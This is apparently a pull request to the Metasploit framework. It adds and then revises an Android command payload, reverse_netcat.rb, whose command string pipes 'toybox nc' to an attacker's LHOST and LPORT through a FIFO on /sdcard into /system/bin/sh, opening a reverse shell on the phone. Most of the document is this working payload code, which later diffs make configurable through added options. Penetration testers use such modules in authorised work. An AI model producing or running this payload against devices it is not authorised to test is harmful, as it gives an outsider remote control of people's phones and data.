### PR TITLE
add reverse_netcat cmd payload for Android

### DIFF
--- a/modules/payloads/singles/cmd/android/reverse_netcat.rb
+++ b/modules/payloads/singles/cmd/android/reverse_netcat.rb
@@ -28,7 +28,7 @@ module MetasploitModule
       'Handler'       => Msf::Handler::ReverseTcp,
       'Session'       => Msf::Sessions::CommandShell,
       'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'netcat',
+      'RequiredCmd'   => 'toybox',
       'Payload'       =>
         {
           'Offsets' => { },

--- a/modules/payloads/singles/cmd/android/reverse_netcat.rb
+++ b/modules/payloads/singles/cmd/android/reverse_netcat.rb
@@ -18,10 +18,7 @@ module MetasploitModule
     super(merge_info(info,
       'Name'          => 'Android Command Shell, Reverse TCP (via netcat)',
       'Description'   => 'Creates an interactive shell via netcat',
-      'Author'         =>
-        [
-          'Auxilus',
-        ],
+      'Author'        => [ 'Auxilus' ],
       'License'       => MSF_LICENSE,
       'Platform'      => 'android',
       'Arch'          => ARCH_CMD,
@@ -29,12 +26,15 @@ module MetasploitModule
       'Session'       => Msf::Sessions::CommandShell,
       'PayloadType'   => 'cmd',
       'RequiredCmd'   => 'toybox',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
+      'Payload'       => { 'Offsets' => { }, 'Payload' => '' }
       ))
+    register_options(
+      [
+        OptString.new('SHELL', [ true, "The shell to execute.", "/system/bin/sh" ]),
+        OptString.new('NETCAT', [ true, "The netcat command to use.", "toybox nc" ]),
+        OptString.new('MKFIFO', [ true, "The mkfifo command to use.", "mkfifo" ]),
+        OptString.new('WritableDir', [ true, "The temporary directory to use.", "/sdcard/" ]),
+      ])
   end
 
   #
@@ -48,7 +48,7 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
-    "/system/bin/toybox mkfifo /sdcard/#{backpipe}; /system/bin/toybox nc #{datastore['LHOST']} #{datastore['LPORT']} 0</sdcard/#{backpipe} | /system/bin/sh >/sdcard/#{backpipe} 2>&1; rm /sdcard/#{backpipe}"
+    backpipe = datastore['WritableDir'] + Rex::Text.rand_text_alpha_lower(4+rand(4))
+    "#{datastore['MKFIFO']} #{backpipe}; #{datastore['NETCAT']} #{datastore['LHOST']} #{datastore['LPORT']} 0<#{backpipe} | #{datastore['SHELL']} >#{backpipe} 2>&1; rm #{backpipe}"
   end
 end

--- a/modules/payloads/singles/cmd/android/reverse_netcat.rb
+++ b/modules/payloads/singles/cmd/android/reverse_netcat.rb
@@ -1,0 +1,54 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = :dynamic
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Android Command Shell, Reverse TCP (via netcat)',
+      'Description'   => 'Creates an interactive shell via netcat',
+      'Author'         =>
+        [
+          'Auxilus',
+        ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'android',
+      'Arch'          => ARCH_CMD,
+      'Handler'       => Msf::Handler::ReverseTcp,
+      'Session'       => Msf::Sessions::CommandShell,
+      'PayloadType'   => 'cmd',
+      'RequiredCmd'   => 'netcat',
+      'Payload'       =>
+        {
+          'Offsets' => { },
+          'Payload' => ''
+        }
+      ))
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    return super + command_string
+  end
+
+  #
+  # Returns the command string to use for execution
+  #
+  def command_string
+    backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
+    "/system/bin/toybox mkfifo /sdcard/#{backpipe}; /system/bin/toybox nc #{datastore['LHOST']} #{datastore['LPORT']} 0</sdcard/#{backpipe} | /system/bin/sh >/sdcard/#{backpipe} 2>&1; rm /sdcard/#{backpipe}"
+  end
+end


### PR DESCRIPTION
`reverse_netcat` payload for Android using `toybox` (Android 6.0+) 